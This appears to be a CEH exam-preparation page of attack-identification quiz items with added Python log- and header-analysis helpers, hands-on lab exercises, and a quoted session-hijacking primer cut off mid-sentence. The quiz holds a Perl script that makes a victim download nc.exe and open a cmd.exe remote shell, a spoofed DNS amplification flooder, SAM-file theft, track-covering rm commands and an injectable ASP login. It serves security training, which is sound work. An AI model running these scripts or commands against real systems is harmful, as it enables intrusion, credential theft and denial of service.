
Attack #1

#rm rootkit.c
#ps -aux | grep inetd ; ps -aux | grep portmap ; rm /sbin/portmap ; rm /tmp/h ; rm /usr/sbin/rpc.portmap ; rm -rf .bash* ; rm -rf /root/.bash_history ; rm -rf /usr/sbin/named
359 ? 00:00:00 inetd
#ps -aux | grep portmap

What is the attacker trying to do?

A. Cover his/her tracks
B. Port scan
C. Escalate privileges
D. Man-in-the-middle attack

Attack #2

GET /msadc/…../…../…../winnt/system32/cmd.exe?/c+dir+c:\ HTTP/1.1..Accept: image/gif, image/x-xbitmap, image/jpeg, image/pjpeg, excel, application/msword, application/vnd.ms-powerpoint, */*..Accept-Language: en-us..Accept-Encoding: gzip, deflate..User-Agent: Mozilla/4.0 (compatible; MSIE 5.01; Windows 95)..Host: lib.bvxttrip.org..Connection: Keep-Alive..Cookie: ASPSESSIONIDGQQQQQZU=KNOHEMW

What type of attack is being performed?

A. SQL injection
B. Firewalking
C. Directory Traversal
D. Cross-site scripting

Attack #3

A screen pops up on your screen with the following message:

Message from SYSTEM to ALERT on 7/19/2005 6:00:03 PM

STOP! WINDOWS REQUIRES IMMEDIATE ATTENTION.
Windows has found Critical Errors.
To fix the errors please do the following:
1. Download Registry Repair from http://www.repairreg.com
2. Install Registry Repair
3. Run Registry Repair
4. Reboot your computer
FAILURE TO ACT NOW MAY LEAD TO DATA LOSS AND CORRUPTION

What could cause this message?

A. Windows messenger SPAM
B. MyDoom virus
C. Beast Trojan
D. Denial of Service attack

Attack #4

You receive 91 ICMP_ECHO packets within 90 minutes from 47 different sites. 77 of the ICMP_ECHO packets have ICMP ID: 39612 and Seq:57072. 13 of the ICMP_ECHO packets have ICMP ID:0 and Seq:0.

What does this mean?

A. Attacker is using NAT.

B. Attacker modified TCP/IP stack on the attacking system.

C. 77 packets are from a single subnet while 13 of the packets are from a different subnet.

D. ICMP ID and Sequence numbers are set by a tool and not the operating system.
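An added example (not part of the original page) of the check an analyst would run on such a capture: constructed tcpdump-style echo-request lines are parsed and grouped by ICMP ID/Seq across source addresses. A normal operating system ping assigns the ID per process and increments Seq per packet, so one identical (ID, Seq) pair arriving from many unrelated hosts is the fingerprint of a tool that hard-codes those fields. The log lines and addresses below are constructed sample input.

```python
import re
from collections import defaultdict

# Constructed tcpdump-style lines (not from the page): one (id, seq) pair reused by
# several unrelated sources, a second fixed (0, 0) pair, and one host whose OS
# increments seq normally.
SAMPLE_LINES = """\
IP 198.51.100.7 > 192.0.2.10: ICMP echo request, id 39612, seq 57072, length 64
IP 203.0.113.44 > 192.0.2.10: ICMP echo request, id 39612, seq 57072, length 64
IP 198.51.100.91 > 192.0.2.10: ICMP echo request, id 39612, seq 57072, length 64
IP 203.0.113.9 > 192.0.2.10: ICMP echo request, id 0, seq 0, length 64
IP 198.51.100.200 > 192.0.2.10: ICMP echo request, id 0, seq 0, length 64
IP 192.0.2.55 > 192.0.2.10: ICMP echo request, id 4211, seq 1, length 64
IP 192.0.2.55 > 192.0.2.10: ICMP echo request, id 4211, seq 2, length 64
IP 192.0.2.55 > 192.0.2.10: ICMP echo request, id 4211, seq 3, length 64
"""

ECHO_RE = re.compile(
    r"IP (?P<src>[\d.]+) > (?P<dst>[\d.]+): ICMP echo request, "
    r"id (?P<id>\d+), seq (?P<seq>\d+)"
)


def parse_echo_requests(text):
    """Return (src, icmp_id, seq) tuples for every echo-request line."""
    records = []
    for line in text.splitlines():
        m = ECHO_RE.search(line)
        if m:
            records.append((m.group("src"), int(m.group("id")), int(m.group("seq"))))
    return records


def sources_per_signature(records):
    """Map each (id, seq) pair to the set of distinct sources that used it."""
    sig = defaultdict(set)
    for src, icmp_id, seq in records:
        sig[(icmp_id, seq)].add(src)
    return sig


def tool_generated_signatures(records, min_sources=2):
    """(id, seq) pairs shared by at least min_sources distinct hosts.

    Identical ID and Seq from many senders cannot come from their TCP/IP
    stacks; it points at a tool that sets both fields to constants.
    """
    sig = sources_per_signature(records)
    return {pair: sorted(srcs) for pair, srcs in sig.items()
            if len(srcs) >= min_sources}


if __name__ == "__main__":
    recs = parse_echo_requests(SAMPLE_LINES)
    for pair, srcs in tool_generated_signatures(recs).items():
        print(f"id={pair[0]} seq={pair[1]} seen from {len(srcs)} sources: {srcs}")
```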

Attack #5

Log entry:

1/19-13:22:01:44:812319 192.168.145.98:21 -> 200.100.50.25:4214 TCP TTL:63 TOS:0x10 ID:11842 DF

What service is being exploited?

A. SMTP B. FTP C. WWW D. SQL

Attack #6

mkdir -p /etc/X11/appInk/Internet/.etc
mkdir -p /etc/X11/appInk/Internet/.etcpasswd
touch -acmr /etc/passwd /etc/X11/AppInk/Internet/.etcpasswd
passwd nobody -d
passwd dns -d
touch -acmr /etc/X11/appInk/Internet/.etcpasswd /etc/passwd
touch -acmr /etc/X11/appInk/Internet/.etc /etc

Is the attacker trying to change the password of an account?

How many accounts are being manipulated?

Attack #7

12/09-01:22:31.167035 207.219.240:1882 -> 172.16.1.104:21 TCP TTL:50 TOS:0x0 ID:53476 DF

*****PA* Seq: 0x33BC72AD Ack: 0x110CE81E Win: 0x7D78 TCP Options => NOP NOP TS: 126045057 105803098

50 41 53 53 20 90 90 90 90 90 90 90 90 90 90 PASS ……….

90 90 90 90 90 90 90 90 90 90 90 90 90 90 90 ………..

90 90 90 90 90 90 90 90 90 90 90 90 90 90 90 ………..

90 90 90 90 90 90 90 90 90 90 90 90 90 90 90 ………..

90 90 90 90 90 90 90 90 90 90 90 90 90 90 90 ………..

90 90 90 90 90 90 90 90 90 90 90 90 90 90 90 ………..

90 90 90 90 90 90 90 90 90 90 90 90 90 90 90 ………..

90 90 90 90 90 90 90 90 90 90 90 90 90 90 90 ………..

90 90 90 90 90 90 90 90 90 90 90 90 90 90 90 ………..

90 90 90 90 90 90 90 90 90 90 90 90 90 90 90 ………..

90 90 90 90 90 90 90 90 90 90 90 90 90 90 90 ………..

90 90 90 90 90 90 90 90 90 90 90 90 90 90 90 ………..

90 90 90 90 90 90 90 90 90 90 90 90 90 90 90 ………..

90 90 90 90 90 90 90 90 90 90 90 90 90 90 90 ………..

90 90 90 90 90 90 90 90 90 90 90 90 90 90 90 ………..

<OUTPUT OMITTED>

=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=

12/09-01:22:31.169534 172.16.1.104:21 -> 207.219.207.240:1882 TCP TTL: 63 TOS: 0x10 ID: 48231 DF

*****PA* Seq: 0x110CE81E Ack: 0x33BC7446 Win: 0x7D78 TCP Options => NOP NOP TS: 105803113 126045057

35 33 30 20 4C 6F 67 69 6E 20 69 6E 63 6F 72 72 530 Login Incorr

65 63 74 2E 0D 0A etc…

Was the attacker successful?
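An added example (not part of the original page) that cross-checks the two segments above with the sequence-number arithmetic of RFC 793: the server's Seq must equal the client's Ack, and the server's Ack minus the client's Seq (modulo 2**32) is the number of payload octets the server accepted, which tells you how much of the PASS buffer reached the FTP daemon before it answered 530. The helpers also show the wrap-safe comparison a naive < gets wrong at the 2**32 boundary.

```python
MOD = 1 << 32  # TCP sequence numbers live in a 32-bit space and wrap around

# Values copied from the two packets in Attack #7
CLIENT_SEQ = 0x33BC72AD   # Seq of the client's PASS segment
CLIENT_ACK = 0x110CE81E   # Ack in the client's segment
SERVER_SEQ = 0x110CE81E   # Seq of the server's "530 Login incorrect" reply
SERVER_ACK = 0x33BC7446   # Ack in the server's reply


def seq_add(seq, n):
    """Advance a sequence number by n octets, wrapping at 2**32."""
    return (seq + n) % MOD


def seq_diff(a, b):
    """Signed distance from b to a in sequence space (modulo 2**32)."""
    d = (a - b) % MOD
    return d - MOD if d >= MOD // 2 else d


def seq_lt(a, b):
    """True if a comes before b, correct across the 2**32 - 1 -> 0 wrap."""
    return seq_diff(a, b) < 0


def acknowledged_octets(sender_seq, peer_ack):
    """Payload octets of the sender's segment covered by the peer's ACK."""
    return seq_diff(peer_ack, sender_seq)


def check_exchange(client_seq, client_ack, server_seq, server_ack):
    """Consistency checks for a request/reply pair like the one above."""
    return {
        # the server's Seq must be exactly what the client said it expects next
        "server_seq_matches_client_ack": server_seq == client_ack,
        # server ACKs client_seq + len(payload), so the difference is the length
        "client_payload_octets": acknowledged_octets(client_seq, server_ack),
        # the ACK must lie after the client's Seq in modular order
        "whole_payload_acked": seq_lt(client_seq, server_ack),
    }


if __name__ == "__main__":
    print(check_exchange(CLIENT_SEQ, CLIENT_ACK, SERVER_SEQ, SERVER_ACK))
    # at the wrap, the naive comparison and the modular one disagree
    print(0xFFFFFFF0 < 0x10, seq_lt(0xFFFFFFF0, 0x10))
```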

Attack #8

############################################
$port = 53; # Spawn cmd.exe on port X
$your = "192.168.1.1"; # Your FTP server
$user = "Anonymous"; #login as
$pass = '[email protected]'; #password
############################################
$host = $ARGV[0];
print "Starting...\n";
print "Server will download the file nc.exe from $your FTP server.\n";
system("perl msadc.pl -h $host -C \"echo open $your >sasfile\"");
system("perl msadc.pl -h $host -C \"echo $user>>sasfile\"");
system("perl msadc.pl -h $host -C \"echo $pass>>sasfile\"");
system("perl msadc.pl -h $host -C \"echo bin>>sasfile\"");
system("perl msadc.pl -h $host -C \"echo get nc.exe>>sasfile\"");
system("perl msadc.pl -h $host -C \"echo get hacked.html>>sasfile\"");
system("perl msadc.pl -h $host -C \"echo quit>>sasfile\"");
print "Server is downloading...\n";
system("perl msadc.pl -h $host -C \"ftp \-s\:sasfile\"");
print "Press ENTER when download is finished .. (That's why it's good to have your own ftp server)\n";
$o=<STDIN>; print "Opening...\n";
system("perl msadc.pl -h $host -C \"nc -l -p $port -e cmd.exe\"");
print "Done.\n";
#system("telnet $host $port"); exit(0);

What does this code do?

A. Creates a share called sasfile
B. Creates a backdoor account
C. Opens a telnet listener that requires no username or password
D. Creates a FTP server

Attack #9

use Net::DNS::Resolver;
use Net::RawIP;
open(LIST,"ns.list");
@list=<LIST>;
close LIST;
chomp(@list);
my $lnum=@list;
my $i=0;
my $loop=0;
if ($ARGV[0] eq '') {
print "Usage: ./hackme.pl <target IP> <loop count>\n";
exit(0);
}
while($loop < $ARGV[1]) {
while($i < $lnum) {
my $source = $ARGV[0];
my $dnspkt = new Net::DNS::Packet("google.com", "ANY");
my $pktdata = $dnspkt->data;
my $sock = new Net::RawIP({udp=>{}});
$sock->set({ip=> { saddr => $source, daddr => $list[$i], frag_off=>0,tos=0,id=>1565, udp => {source => 53, dest => 53, data=>$pktdata} });
$sock->send;
$i++;
}
$loop++; $i=0;
}
exit(0);

What type of attack is this?

A. DNS lookup attacks
B. DNS reflection and amplification attack
C. FTP DOS
D. FTP backdoor

Attack #10

C:\> cmd /c type c:\winnt\repair\sam > c:\file.txt
Volume in drive C has no label.
Volume Serial Number is 3105-51BF
Directory of C:\
3/14/04 04:12a 0 AUTOEXEC.BAT
3/14/04 8:01a 322 boot.ini
3/14/05 12:44p <DIR> WINNT
3/14/05 12:10p <DIR> TEMP
1,221,095,103 bytes free
C:\>type file.txt
C:\>copy file.txt c:\inetpub\wwwroot
C:\>GET file.txt HTTP/1.1
Server: Microsoft-IIS/4.0
Date: Sun, 04 Feb 2001 15:44:12 GMT
ETag: "9814ed8abc83103:8ff"
Content-Length: 5131

What is the hacker trying to steal?

A. file.txt
B. index.html
C. sam.txt
D. cmd.exe

Attack #11

Apr 24 14:46:46 [4663]: spp_portscan: portscan detected from 194.222.156.169
Apr 24 14:46:46 [4663]: IDS27/FIN Scan: 194.222.156.169:56693 -> 172.16.1.107:482
Apr 24 18:01:05 [4663]: IDS/DNS-version-query: 212.244.97.121:3485 -> 172.16.1.107:53
Apr 24 19:04:01 [4663]: IDS213/ftp-passwd-retrieval: 194.222.156.169:1425 -> 172.16.1.107:21
Apr 25 08:02:41 [5875]: spp_portscan: PORTSCAN DETECTED from 24.9.255.53
Apr 25 02:08:07 [5875]: IDS277/DNS-version-query: 63.226.81.13:4499 -> 172.16.1.107:53
Apr 25 02:08:07 [5875]: IDS277/DNS-version-query: 63.226.81.13:4630 -> 172.16.1.101:53
Apr 25 02:38:17 [5875]: IDS/RPC-rpcinfo-query: 212.251.1.94:642 -> 172.16.1.107:111
Apr 25 19:37:32 [5875]: IDS230/web-cgi-space-wildcard: 198.173.35.164:4221 -> 172.16.1.107:80
Apr 26 05:45:12 [6283]: IDS212/dns-zone-transfer: 38.31.107.87:2291 -> 172.16.1.101:53
Apr 26 06:43:05 [6283]: IDS181/nops-x86: 63.226.81.13:1351 -> 172.16.1.107:53
Apr 26 06:44:25 victim7 PAM_pwdb[12509]: (login) session opened for user simple by (uid=0)
Apr 26 06:44:36 victim7 PAM_pwdb[12521]: (su) session opened for user simon by simple(uid=506)
Apr 26 06:45:34 [6283]: IDS175/socks-probe: 24.112.167.35:20 -> 172.16.1.107:1080
Apr 26 06:52:10 [6283]: IDS127/telnet-login-incorrect: 172.16.1.107:23 -> 213.28.22.189:4558

What type of attack is this?

A. Unsuccessful port scan
B. The hacker has a backdoor into the compromised system
C. A DNS poisoning attack
D. An unsuccessful WEP attack

Attack #12

Below is the e-mail header of a spoofed header found on the Internet. What is the IP address of the true source?

Return-Path: <[email protected]>
Received: from smtp.com (fw.emumail.com [215.52.220.122])
by raq-221-181.ev1.net (8.10.2/8.10.2) with ESMTP id h78NIn404807
for <[email protected]>; Sat, 9 Aug 2003 18:18:50 -0500
Received: (qmail 12685 invoked from network); 8 Aug 2003 23:25:25 -0000
Received: from ([19.25.19.10])
by smtp.com with SMTP
Received: from unknown (HELO CHRISLAPTOP) (168.150.84.123)
by localhost with SMTP; 8 Aug 2003 23:25:01 -0000
From: "Bill Gates" <[email protected]>
To: "mikeg" <[email protected]>
Subject: We need your help!
Date: Fri, 8 Aug 2003 19:12:28 -0400
Message-ID: <51.32.123.21@CHRISLAPTOP>
X-Mailer: Microsoft Outlook, Build 10.0.2627
X-MimeOLE: Produced By Microsoft MimeOLE V6.00.2800.1165
Importance: Normal
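An added example (not part of the original page) of how an analyst works such a header: unfold the folded lines, collect the Received: values, and read them from the bottom up, because each relay prepends its own line and only the lowest one records the address of the host that first handed the message in. The header below is a constructed copy of the one above; the redacted e-mail addresses are replaced with example.invalid placeholders.

```python
import re

# Constructed copy of the header in Attack #12; addresses are placeholders.
RAW_HEADER = """\
Return-Path: <sender@example.invalid>
Received: from smtp.com (fw.emumail.com [215.52.220.122])
\tby raq-221-181.ev1.net (8.10.2/8.10.2) with ESMTP id h78NIn404807
\tfor <mikeg@example.invalid>; Sat, 9 Aug 2003 18:18:50 -0500
Received: (qmail 12685 invoked from network); 8 Aug 2003 23:25:25 -0000
Received: from ([19.25.19.10])
\tby smtp.com with SMTP
Received: from unknown (HELO CHRISLAPTOP) (168.150.84.123)
\tby localhost with SMTP; 8 Aug 2003 23:25:01 -0000
From: "Bill Gates" <billg@example.invalid>
To: "mikeg" <mikeg@example.invalid>
Subject: We need your help!
Date: Fri, 8 Aug 2003 19:12:28 -0400
Message-ID: <51.32.123.21@CHRISLAPTOP>

body text
"""

IPV4_RE = re.compile(r"\b(\d{1,3}(?:\.\d{1,3}){3})\b")


def unfold_headers(raw):
    """Split the header block into logical lines; a line starting with
    whitespace continues the previous header (RFC 5322 folding)."""
    headers = []
    for line in raw.splitlines():
        if not line.strip():          # blank line ends the header block
            break
        if line[0] in " \t" and headers:
            headers[-1] += " " + line.strip()
        else:
            headers.append(line)
    return headers


def received_chain(raw):
    """Received: values in file order: top = added last, bottom = added by the
    first server that accepted the message."""
    return [h.split(":", 1)[1].strip() for h in unfold_headers(raw)
            if h.lower().startswith("received:")]


def trace_origin(raw):
    """Walk the chain bottom-up. Each hop records the relay that wrote the
    line ('by') and the peer address it saw ('from_ip'). The from-address of
    the lowest hop is the best evidence of the real origin; From:, Date: and
    Message-ID: are written by the sender and can say anything."""
    hops = []
    for value in reversed(received_chain(raw)):
        m = re.search(r"\bfrom\s+(.*?)\s+by\s+(\S+)", value)
        ips = IPV4_RE.findall(value)
        hops.append({"by": m.group(2) if m else None,
                     "from_ip": ips[0] if ips else None})
    origin = next((h["from_ip"] for h in hops if h["from_ip"]), None)
    return hops, origin


if __name__ == "__main__":
    hops, origin = trace_origin(RAW_HEADER)
    for i, hop in enumerate(hops):
        print(f"hop {i}: by={hop['by']} from={hop['from_ip']}")
    print("likely origin:", origin)
```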

Attack #13

The following code is vulnerable to what type of attack?

<%
Set objConn = CreateObject("ADODB.Connection")
objConn.Open Application("WebUsersConnection")
sSQL="SELECT * FROM Users where Username='" & Request("user") & _
"' and Password='" & Request("pwd") & "'"
Set RS = objConn.Execute(sSQL)
Set objConn = nothing
Response.Redirect("mainpage.asp")
End If
%>

Attack #14

Below is a partial hexdump of a packet. What version of Microsoft IIS is this web server?

000 00 00 BA 5E BA 11 00 A0 C9 B0 5E BD 08 00 45 00 ...^...^...E.
010 05 DC 1D E4 40 00 7F 06 C2 6D 0A 00 00 02 0A 00 ....@....m......
020 01 C9 00 50 07 75 05 D0 00 C0 04 AE 7D F5 50 10 ...P.u...}.P.
030 70 79 8F 27 00 00 48 54 54 50 2F 31 2E 31 20 32 py.'..HTTP/1.1.2
040 30 30 20 4F 4B 0D 0A 56 69 61 3A 20 31 2E 30 20 00.OK..Via:.1.0.
050 53 54 52 49 44 45 52 0D 0A 50 72 6F 78 79 2D 43 STRIDER..Proxy-C
060 6F 6E 6E 65 63 74 69 6F 6E 3A 20 4B 65 65 70 2D onnection:.Keep-
070 41 6C 69 76 65 0D 0A 43 6F 6E 74 65 6E 74 2D 4C Alive..Content-L
080 65 6E 67 74 68 3A 20 32 39 36 37 34 0D 0A 43 6F ength:.29674..Co
090 6E 74 65 6E 74 2D 54 79 70 65 3A 20 74 65 78 74 ntent-Type:.text
0A0 2F 68 74 6D 6C 0D 0A 53 65 72 76 65 72 3A 20 4D /html..Server:.M
0B0 69 63 72 6F 73 6F 66 74 2D 49 49 53 2F 34 2E 30 icrosoft-IIS/4.0
0C0 0D 0A 44 61 74 65 3A 20 53 75 6E 2C 20 32 35 20 ..Date:.Sun,.25.
0D0 4A 75 6C 20 31 39 39 39 20 32 31 3A 34 35 3A 35 Jul.1999.21:45:5
0E0 31 20 47 4D 54 0D 0A 41 63 63 65 70 74 2D 52 61 1.GMT..Accept-Ra

Attack #15

Below is a sample output of a web log. What type of attack is being performed here?

Attempted login of unknown user: johnm
Attempted login of unknown user: susaR
Attempted login of unknown user: sencat
Attempted login of unknown user: pete'';
Attempted login of unknown user: ' or 1=1--
Attempted login of unknown user: '; drop table logins--
Login of user jason, sessionID= 0x75627578626F6F6B
Login of user daniel, sessionID= 0x98627579539E13BE
Login of user rebecca, sessionID= 0x9062757944CCB811
Login of user mike, sessionID= 0x9062757935FB5C64
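An added example (not part of the original page) that ties Attack #13 and Attack #15 together: the query is built the same way as the ASP snippet (string concatenation of Request("user") and Request("pwd")), then the parameterised form is run beside it, and the probe strings from the web log above are fed to both against an in-memory SQLite table. A small log filter shows how the probing in Attack #15 can be flagged. The table contents and log sample are constructed.

```python
import re
import sqlite3


def make_db():
    """Constructed Users table (not from the page)."""
    db = sqlite3.connect(":memory:")
    db.execute("CREATE TABLE Users (Username TEXT, Password TEXT)")
    db.executemany("INSERT INTO Users VALUES (?, ?)",
                   [("jason", "s3cret"), ("daniel", "hunter2")])
    return db


def vulnerable_login(db, user, pwd):
    """Same construction as the ASP code in Attack #13: untrusted input is
    concatenated into the SQL text, so a quote in the input edits the query."""
    sql = ("SELECT * FROM Users WHERE Username='" + user +
           "' AND Password='" + pwd + "'")
    return db.execute(sql).fetchall()


def safe_login(db, user, pwd):
    """Parameterised form: the driver binds the values, so quotes and -- in the
    input are compared as data, never parsed as SQL."""
    sql = "SELECT * FROM Users WHERE Username=? AND Password=?"
    return db.execute(sql, (user, pwd)).fetchall()


# Metacharacters and keywords that appear in the Attack #15 probes
INJECTION_RE = re.compile(r"'|--|;|\bdrop\b", re.IGNORECASE)
ATTEMPT_RE = re.compile(r"Attempted login of unknown user: (.*)$")


def flag_injection_attempts(log_text):
    """Return the attempted usernames that look like SQL injection probes."""
    hits = []
    for line in log_text.splitlines():
        m = ATTEMPT_RE.match(line.strip())
        if m and INJECTION_RE.search(m.group(1)):
            hits.append(m.group(1))
    return hits


# Constructed log sample modelled on Attack #15
SAMPLE_LOG = """\
Attempted login of unknown user: johnm
Attempted login of unknown user: pete'';
Attempted login of unknown user: ' or 1=1--
Attempted login of unknown user: '; drop table logins--
Login of user jason, sessionID= 0x75627578626F6F6B
"""

if __name__ == "__main__":
    db = make_db()
    probe = "' or 1=1--"   # turns the WHERE clause into "... or 1=1" and comments out the rest
    print("vulnerable:", len(vulnerable_login(db, probe, "x")), "rows returned")
    print("parameterised:", len(safe_login(db, probe, "x")), "rows returned")
    print("flagged:", flag_injection_attempts(SAMPLE_LOG))
```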

Labs

Introduction

A Certified Ethical Hacker must possess expert-level skills to successfully attack and defend systems. There is often more than one way to exploit a system, so creativity and ‘out-of-the-box’ thinking are encouraged. These labs are not designed to teach you a specific tool for an exploit; they give you an opportunity to test, in a lab environment, the knowledge and skills you are acquiring.

Exam Relevance

You do not need to master any of these labs in order to pass the C|EH exam.

Software Used in Labs

EC-Council does its best to keep the content of the included CDs up to date. In some cases, the tools mentioned in these labs may not be included on the CDs or may be outdated, so if you can't find a tool on your computer, you may want to download it from the Internet. Your instructor can help you find the software.

Footprinting

Footprint the http://www.certifiedhacker.com web site.

Suggested tools:

www.dnsstuff.com

Sam Spade

Smart Whois

www.archive.org

www.kloth.net

IP2Country

NewTracePro

Visual Route

www.centralops.net

Which ISP Owns IP

WhereIsIP

What does it mean to footprint a web site?

What is the contact information for this web site?

Where is the web site located?

What is the IP address of this web site?

When was the web site first put up?

How is Footprinting a web site helpful to an ethical or malicious hacker?

Scanning

1) Nmap.

Launch a packet sniffer (Ettercap, Ethereal/Wireshark, etc.) and run various Nmap scans against other hosts in the classroom. Watch for RSTs, SYN/Acks, etc. coming from the host you are scanning.

2) Hping

Read through the Hping2 man page (available online or in Linux)

Perform a port scan on a computer in the classroom

Experiment with different options in Hping2 to try different types of scans

Bonus: Read the Hping3 man page. Use Hping3 to scan a computer in the web site.

Do you prefer Hping3 or Hping2? Why?

How could a malicious or ethical hacker use Hping2 or Hping3?

Enumeration

Ask another student or your instructor to set up additional accounts and some shares on their computer.

Enumerate the computer.

What is the SID of the Administrator account?

What users exist on the computer?

What is the password of the Administrator? (Hint: NAT or Venom can help you with this)

How do you test for NULL sessions?

How do NULL sessions help you with hacking?

How do you protect against NULL sessions? (Hint: It can be done in the registry or in the local security policies).

System Hacking

Password Cracking

Create three additional users on your computer. Assign one user a short dictionary password of less than eight characters. Give a blank password to another. Assign a difficult password to the third.

Get the hash of the Administrator account.

Suggested tools:

L0phtcrack

Pwdump3v2

Ntinfoscan

What is the password to the Administrator account?

When was the Administrator account last changed?

Are you able to get the passwords of the other accounts?

Steganography

Hide the message “you’ve been hacked” on your computer.

Suggested tools:

NTFS Alternate Data Streams

Snow

NT Rootkit

Blindside

Trojans and Backdoors

Launching A Trojan

Take control of another computer using a Trojan or Backdoor. Note: we haven’t covered the different ways of getting a Trojan on another computer yet, so for this lab you may want to work with another student to launch the Trojan on another computer.

Suggested tools:

NetBus

SubSeven

BackOrifice2000

Donald Dick

Beast

Use Netcat to gain shell access to your victim host.

What is the Netcat syntax on the victim host?

Read the Netcat man page. What other things can you do with Netcat?

Can you think of any ways you might get the Trojan on the victim host?

Detecting Trojan Activity

Detect the ports and processes running on your computer.

Suggested tools:

Fport

TCP View

What's on my computer?

Hacker Eliminator

Process Viewer

Windows task manager

Netstat

Did you find any Trojans running on your computer? If so, what ports are they listening on?

Trojan Wrappers

Using Yet Another Binder (YAB), bind a Trojan with a Windows program (such as Solitaire or Calculator).

Sniffers

1) Sniff web traffic on the network.

Suggested tools:

Ettercap (Linux)

Windump/tcpdump

Wireshark/Ethereal

2) MSN chat

Work with a partner to set up MSN Messenger on your computers. Launch a sniffer and chat with each other. Can you see each other’s conversation?

Download the MSN IM encryption software Simplite (www.secway.fr) and re-launch MSN IM.

Can you see each other’s conversation?

3) E-mail

Set up a free e-mail account on mail.com. Configure Outlook Express for your new POP account. Run the sniffer in the background while you send test messages. Can you see your password and/or your e-mail messages?

4) ARP poisoning / MAC flooding

Test out ARP poisoning and/or MAC flooding to capture all traffic.

Suggested tools:

Ettercap (Linux)

Macof (Linux)

Cain & Abel

Can you see traffic from other hosts?

Denial Of Service

As a class, agree on a denial of service tool and launch it against a single computer in the classroom.

Suggested tools:

DDOSPing

Blast20

Nemesy13

Datapool

If possible, launch multiple processes of these tools.

On the victim host, launch task manager and/or performance monitor to see if you are making an impact.

Session Hijacking

The following is from http://www.csn.ul.ie/~syfer/tutorials/sessionhijacking.htm. It requires the use of a hub in the classroom. Depending on your location, you may or may not have a hub.

Session Hijacking

Session hijacking. What a powerful name. For me personally, the name conjures up mental pictures of airplanes with masked gunmen and bomb-laden buses. In actuality, session hijacking is far less physically dangerous but way more financially rewarding.

In a previous article, I discussed ARP poisoning and password detection tools. This takes that article to the next level and discusses how to hijack sessions. Sniffing networks (or ARP poisoning to sniff switched networks) is a great way to collect passwords.

Unfortunately, tools like Dsniff and ettercap aren't always capable of detecting every password that crosses the network. This is where session hijacking can become your friend (or your worst enemy depending on which side of the infosec coin you're on.) In this article I will detail Netflood's test results and the techniques we used to hijack active sessions.

Abstract:

In order to session hijack traffic, multiple attacks or techniques may have to take place. For example, one may have to DoS attack a server in order to keep it from sending RST (reset) packets to the victim. If I were to detail a DoS technique (with every available argument) it would distract thoughts away from the real topic of this article. Some knowledge will have to be gleaned from RFC's, man pages, code comments, by researching on your own, or by merely using your intelligence to conceive of vulnerabilities not discussed herein; Hence, the word "primer". No one wrote me a little "session hijacking for dummies" book and I figured it out, so you can too.

Disclaimer:

This paper describes nothing more than some vulnerabilities of the Transmission Control Protocol and tools/thoughts which exploit those vulnerabilities. It is intended for educational use only. You are responsible for what you do with this information. I am no more responsible for people committing crimes with this information then chemistry instructors are responsible for people who construct bombs or chemical warfare devices. [Insert expensive lawyer jargon here to stave off unfounded FBI allegations ala Sil]. All your base are belong to us.

Contents:

A look at TCP

Local Network Session Hijacking

Remote Network Session Hijacking

Defending against session hijack attacks

A Look At TCP

Transmission Control Protocol (TCP) is addressed in RFC 793. For the sake of brevity, I will only cover relevant portions of the RFC; adding information to it when necessary. The Transmission Control Protocol (TCP) is intended for use as a highly reliable host-to host protocol between hosts in packet-switched computer communication networks, and in interconnected systems of such networks.

TCP must recover from data that is damaged, lost, duplicated, or delivered out of order by the internet communication system. This is achieved by assigning a sequence number to each octet transmitted, and requiring a positive acknowledgment (ACK) from the receiving TCP. If the ACK is not received within a timeout interval, the data is retransmitted. At the receiver, the sequence numbers are used to correctly order segments that may be received out of order and to eliminate duplicates. Damage is handled by adding a checksum to each segment transmitted, checking it at the receiver, and discarding damaged segments.

A fundamental notion in the design is that every octet of data sent over a TCP connection has a sequence number. Since every octet is sequenced, each of them can be acknowledged. The acknowledgment mechanism employed is cumulative so that an acknowledgment of sequence number X indicates that all octets up to but not including X have been received. This mechanism allows for straight-forward duplicate detection in the presence of retransmission. Numbering of octets within a segment is: the first data octet immediately following the header is the lowest numbered, and the following octets are numbered consecutively.

It is essential to remember that the actual sequence number space is finite, though very large. This space ranges from 0 to 4294967295 (2**32)-1. Since the space is finite, all arithmetic dealing with sequence numbers must be performed modulo 2**32 (4294967296). This unsigned arithmetic preserves the relationship of sequence numbers as they cycle from 2**32 - 1 to 0 again. There are some subtleties to computer modulo arithmetic, so great care should be taken in programming the comparison of such values. So you see that the ISN can be any number between 0 and 4294967295. You also hopefully noticed that every octet has a sequence number, not every session. The server (TCPB) will respond to the client (TCPA) with its own sequence number, while acknowledging the client's sequence number.

See below for an example:

Sequence prediction to take over networks was first written about in 1985 (or thereabouts) by none other than Robert T. Morris (his son created the first Internet worm). The first attack employing this technique did not occur until Christmas of '94, this is known as the Mitnick hack of Shimomura (or "Christmas hack"). Over the years, OS's have become more random in deriving the ISN, but we all know that computers are not random thinkers. Eventually over time, even computers choosing random numbers will repeat themselves, because the randomness is based on an internal algorithm. There is a great in-depth article, which can be found here, that explores sequence number generation and prediction in more detail.

Once a sequence number has been agreed to, all following data will be the ISN+1. This makes injecting data into the communication stream possible, if one were so inclined. The tricky part is not hijacking the session, but in finding out the ISN. Once the ISN (or the ISN increment) is discovered, everything else is gravy.

3 requirements to hijack non-encrypted TCP communications:

1. There must be non-encrypted session oriented traffic.

2. Attacker must be able to recognize TCP sequence numbers and predict what the next sequence number will be.

3. Attacker must spoof a host's MAC or IP address to receive communications which are not destined for the attacker's host

If the attacker is on your local segment, they can sniff the connections and therefore see what the ISN+1 number is, they can also have the traffic routed back to them by poisoning the ARP cache. This is why implementing internal network protocol encryption is so important (albeit rarely done).

Local Network Session Hijacking

Rather than reinvent the wheel, we used a tool that's readily available, called Hunt (downloadable @ netflood.net). We will use the newest version (1.5) because it runs on WindowsME (that's just a joke to
